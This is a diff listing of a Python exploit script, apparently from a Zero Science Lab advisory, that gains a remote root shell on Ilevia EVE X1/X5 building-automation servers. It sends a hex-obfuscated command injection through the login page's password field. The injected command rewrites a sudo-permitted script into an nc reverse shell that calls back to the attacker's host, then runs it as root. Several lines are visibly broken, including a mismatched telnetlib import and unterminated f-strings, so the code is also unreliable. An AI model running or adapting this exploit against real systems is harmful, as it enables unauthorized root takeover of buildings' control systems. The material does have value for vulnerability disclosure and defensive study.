1+ #!/usr/bin/env python
2+ #
3+ #
4+ # Ilevia EVE X1/X5 Server 4.7.18.0.eden Reverse Rootshell
5+ #
6+ #
7+ # Vendor: Ilevia Srl.
8+ # Product web page: https://www.ilevia.com
9+ # Affected version: <= 4.7.18.0.eden (Logic ver: 6.00)
10+ #
11+ # Summary: EVE is a smart home and building automation solution designed
12+ # for both residential and commercial environments, including malls, hotels,
13+ # restaurants, bars, gyms, spas, boardrooms, and offices. It enables comprehensive
14+ # control and monitoring of electrical installations through a highly customizable,
15+ # user-friendly interface.
16+ #
17+ # EVE is a multi-protocol platform that integrates various systems within
18+ # a smart building to enhance comfort, security, safety, and energy efficiency.
19+ # Users can manage building functions via iPhone, iPad, Android devices, Windows
20+ # PCs, or Mac computers.
21+ #
22+ # The EVE X1 Server is the dedicated hardware solution for advanced building
23+ # automation needs. Compact and powerful, it is ideal for apartments, small
24+ # to medium-sized homes, and smaller commercial installations. It is designed
25+ # to manage entire automation systems reliably and efficiently.
26+ #
27+ # Desc: A misconfiguration in the sudoers file permits passwordless execution
28+ # of specific Bash shell scripts via sudo, exposing a critical privilege escalation
29+ # vulnerability. When such scripts are writable by a web-facing user (www-data) or
30+ # accessible through a command injection vector, an attacker can overwrite or replace
31+ # them with malicious payloads. Upon execution with sudo, these scripts run with
32+ # elevated privileges, allowing the attacker to gain full root access remotely.
33+ #
34+ # ------------------------------------------------------------------------------
35+ # $ python rewteve.py 10.0.0.18:8080 10.0.0.4 5555
36+ # [+] Cyber-link active on 0.0.0.0:5555...
37+ # [*] Firing at http://10.0.0.18:8080/ajax/php/login.php
38+ # [+] Pulse from 10.0.0.18:46444
39+ # [*] Probing matrix with 'pwd' signal...
40+ # [+] Verifistring: /home/ilevia/www-config/http/ajax/php
41+ # [*] Synaptic intrusion confirmed, escalating to holo-shell...
42+ # # id
43+ # uid=0(root) gid=0(root) groups=0(root)
44+ # # exit
45+ # [+] ilevia_reboot restored.
46+ # ------------------------------------------------------------------------------
47+ #
48+ # Tested on: GNU/Linux 5.4.35 (armv7l)
49+ # GNU/Linux 4.19.97 (armv7l)
50+ # Armbian 20.02.1 Buster
51+ # Apache/2.4.38 (Debian)
52+ # PHP Version 7.3.14
53+ #
54+ #
55+ # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
56+ # @zeroscience
57+ #
58+ #
59+ # Advisory ID: ZSL-2025-5959
60+ # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5959.php
61+ #
62+ #
63+ # 01.05.2024
64+ #
65+
66+ import jtelnetlib # ._
67+ import threading # ._
68+ import requests # ._
69+ import socket # ._
70+ import time # ._
71+ import sys # ._
72+
73+ def init_quantum (target_data ):
74+ if "http://" not in target_data and "https://" not in target_data :
75+ target_data = "http://" + target_data
76+ if ":" not in target_data .split ("//" )[1 ]:
77+ target_data = target_data .rstrip ("/" ) + ":80"
78+ return target_data .rstrip ("/" )
79+
80+ def spark_neuroport (cyber_gate ):
81+ def neuro_core ():
82+ with socket .socket (socket .AF_INET , socket .SOCK_STREAM ) as s :
83+ s .setsockopt (socket .SOL_SOCKET , socket .SO_REUSEADDR , 1 )
84+ s .bind (("0.0.0.0" , cyber_gate ))
85+ s .listen (1 )
86+ print (f"[+] Cyber-link active on 0.0.0.0:{ cyber_gate } )
87+ conn , addr = s .accept ()
88+ print (f"[+] Pulse from { addr [0 ]} { addr [1 ]} )
89+ holo_term = telnetlib .Telnet ()
90+ holo_term .sock = conn
91+
92+ print ("[*] Probing matrix with 'pwd' signal..." )
93+ conn .sendall (b"pwd\n " )
94+ time .sleep (0.5 )
95+ try :
96+ data_stream = conn .recv (4096 ).decode (errors = 'ignore' )
97+ data_nodes = data_stream .splitlines ()
98+ if data_nodes and data_nodes [0 ].strip () == "pwd" :
99+ data_nodes .pop (0 )
100+ output = "\n " .join (data_nodes ).strip ()
101+ print ("[+] Verifistring:" , output )
102+ if 'ilevia/www-config' in output :
103+ print ("[*] Synaptic intrusion confirmed, escalating to holo-shell..." )
104+ conn .sendall (b"script /dev/null -c /bin/sh\n " )
105+ time .sleep (0.5 )
106+ try :
107+ _ = conn .recv (4096 )
108+ except :
109+ pass
110+ else :
111+ print ("[!] Expected neural path not detected. Holo-shell may be unstable." )
112+ except Exception as e :
113+ print (f"[!] Error in synaptic probe: { e } )
114+
115+ import select
116+
117+ while True :
118+ try :
119+ cmd = input ("# " ).strip ()
120+ if cmd == "exit" :
121+ conn .sendall (b"\x72 \x6d \x20 \x2f \x68 \x6f \x6d \x65 \x2f \x69 \x6c \x65 \x76 \x69 \x61 \x2f "
122+ b"\x77 \x77 \x77 \x2d \x63 \x6f \x6e \x66 \x69 \x67 \x2f \x68 \x74 \x74 \x70 \x2f "
123+ b"\x73 \x68 \x2f \x69 \x6c \x65 \x76 \x69 \x61 \x5f \x72 \x65 \x62 \x6f \x6f \x74 "
124+ b"\x3b \x6d \x76 \x20 \x2f \x68 \x6f \x6d \x65 \x2f \x69 \x6c \x65 \x76 \x69 \x61 "
125+ b"\x2f \x77 \x77 \x77 \x2d \x63 \x6f \x6e \x66 \x69 \x67 \x2f \x68 \x74 \x74 \x70 "
126+ b"\x2f \x73 \x68 \x2f \x69 \x6c \x65 \x76 \x69 \x61 \x5f \x72 \x65 \x62 \x6f \x6f "
127+ b"\x74 \x2e \x6f \x6c \x64 \x20 \x2f \x68 \x6f \x6d \x65 \x2f \x69 \x6c \x65 \x76 "
128+ b"\x69 \x61 \x2f \x77 \x77 \x77 \x2d \x63 \x6f \x6e \x66 \x69 \x67 \x2f \x68 \x74 "
129+ b"\x74 \x70 \x2f \x73 \x68 \x2f \x69 \x6c \x65 \x76 \x69 \x61 \x5f \x72 \x65 \x62 "
130+ b"\x6f \x6f \x74 \x0a " )
131+ print ("[+] ilevia_reboot restored." )
132+ break
133+ if not cmd :
134+ continue
135+ conn .sendall ((cmd + "\n " ).encode ())
136+ response = b""
137+ conn .setblocking (0 )
138+ end_time = time .time () + 0.5 # max 1.5, collect output
139+ while time .time () < end_time :
140+ ready = select .select ([conn ], [], [], 0.1 )
141+ if ready [0 ]:
142+ try :
143+ chunk = conn .recv (8160 )
144+ if not chunk :
145+ break
146+ response += chunk
147+ except :
148+ break
149+ else :
150+ time .sleep (0.1 )
151+ conn .setblocking (1 )
152+ data_stream = response .decode (errors = 'ignore' )
153+ data_nodes = data_stream .splitlines ()
154+ clean_output = []
155+ for line in data_nodes :
156+ if line .strip () == cmd :
157+ continue
158+ if line .strip () in ["$" , "#" ]:
159+ continue
160+ clean_output .append (line )
161+ if clean_output :
162+ print ("\n " .join (clean_output ).strip ())
163+ except Exception :
164+ print ("[!] Neural link terminated." )
165+ break
166+ conn .close ()
167+
168+ cyber_thread = threading .Thread (target = neuro_core )
169+ cyber_thread .start ()
170+ return cyber_thread
171+
172+ def fire_photon (target_matrix , cyber_origin , cyber_gate ):
173+ print (f"[*] Firing at { target_matrix } )
174+ payload = (b"\x3b \x63 \x70 \x20 \x2f \x68 \x6f \x6d \x65 \x2f \x69 \x6c \x65 \x76 \x69 \x61 "
175+ b"\x2f \x77 \x77 \x77 \x2d \x63 \x6f \x6e \x66 \x69 \x67 \x2f \x68 \x74 \x74 \x70 "
176+ b"\x2f \x73 \x68 \x2f \x69 \x6c \x65 \x76 \x69 \x61 \x5f \x72 \x65 \x62 \x6f \x6f "
177+ b"\x74 \x20 \x2f \x68 \x6f \x6d \x65 \x2f \x69 \x6c \x65 \x76 \x69 \x61 \x2f \x77 "
178+ b"\x77 \x77 \x2d \x63 \x6f \x6e \x66 \x69 \x67 \x2f \x68 \x74 \x74 \x70 \x2f \x73 "
179+ b"\x68 \x2f \x69 \x6c \x65 \x76 \x69 \x61 \x5f \x72 \x65 \x62 \x6f \x6f \x74 \x2e "
180+ b"\x6f \x6c \x64 \x3b \x65 \x63 \x68 \x6f \x20 \x22 \x6d \x6b \x6e \x6f \x64 \x20 "
181+ b"\x2f \x74 \x6d \x70 \x2f \x70 \x69 \x70 \x65 \x20 \x70 \x3b \x20 \x2f \x62 \x69 "
182+ b"\x6e \x2f \x73 \x68 \x20 \x2d \x69 \x20 \x3c \x20 \x2f \x74 \x6d \x70 \x2f \x70 "
183+ b"\x69 \x70 \x65 \x20 \x7c \x20 \x6e \x63 \x20 " + # \xn#" #####
184+ f"{ cyber_origin } .encode () + # \x1#" #
185+ b"\x20 " + # :): \xn#" #
186+ f"{ cyber_gate } .encode () + # \xa#" #####
187+ b"\x20 \x3e \x20 \x2f \x74 \x6d \x70 \x2f \x70 \x69 \x70 \x65 \x22 \x20 \x3e \x20 "
188+ b"\x2f \x68 \x6f \x6d \x65 \x2f \x69 \x6c \x65 \x76 \x69 \x61 \x2f \x77 \x77 \x77 "
189+ b"\x2d \x63 \x6f \x6e \x66 \x69 \x67 \x2f \x68 \x74 \x74 \x70 \x2f \x73 \x68 \x2f "
190+ b"\x69 \x6c \x65 \x76 \x69 \x61 \x5f \x72 \x65 \x62 \x6f \x6f \x74 \x3b \x63 \x68 "
191+ b"\x6d \x6f \x64 \x20 \x2b \x78 \x20 \x2f \x68 \x6f \x6d \x65 \x2f \x69 \x6c \x65 "
192+ b"\x76 \x69 \x61 \x2f \x77 \x77 \x77 \x2d \x63 \x6f \x6e \x66 \x69 \x67 \x2f \x68 "
193+ b"\x74 \x74 \x70 \x2f \x73 \x68 \x2f \x69 \x6c \x65 \x76 \x69 \x61 \x5f \x72 \x65 "
194+ b"\x62 \x6f \x6f \x74 \x3b \x73 \x75 \x64 \x6f \x20 \x2f \x68 \x6f \x6d \x65 \x2f "
195+ b"\x69 \x6c \x65 \x76 \x69 \x61 \x2f \x77 \x77 \x77 \x2d \x63 \x6f \x6e \x66 \x69 "
196+ b"\x67 \x2f \x68 \x74 \x74 \x70 \x2f \x73 \x68 \x2f \x69 \x6c \x65 \x76 \x69 \x61 "
197+ b"\x5f \x72 \x65 \x62 \x6f \x6f \x74 " )
198+ try :
199+ requests .post (target_matrix , data = {"userid" :"inas" ,"passwd" :payload }, timeout = 3 )
200+ print ("[*] Photon fired." )
201+ except requests .exceptions .ReadTimeout :
202+ pass
203+ except requests .exceptions .RequestException as e :
204+ print (f"[!] Photon failed: { e } )
205+
206+ def boot_sequence ():
207+ if len (sys .argv ) != 4 :
208+ print (f"Usage: { sys .argv [0 ]} )
209+ print ("Example: python eve.py 1.2.3.4:8080 5.6.7.8 5555" )
210+ sys .exit (1 )
211+
212+ target_data = sys .argv [1 ]
213+ cyber_origin = sys .argv [2 ]
214+ try :
215+ cyber_gate = int (sys .argv [3 ])
216+ except ValueError :
217+ print ("[!] Cyber gate must be numeric." )
218+ sys .exit (1 )
219+
220+ target_matrix = init_quantum (target_data ) + "/ajax/php/login.php"
221+ neuro_thread = spark_neuroport (cyber_gate )
222+ time .sleep (1 )
223+ fire_photon (target_matrix , cyber_origin , cyber_gate )
224+ neuro_thread .join ()
225+
226+ if __name__ == "__main__" :
227+ boot_sequence ()
0 commit comments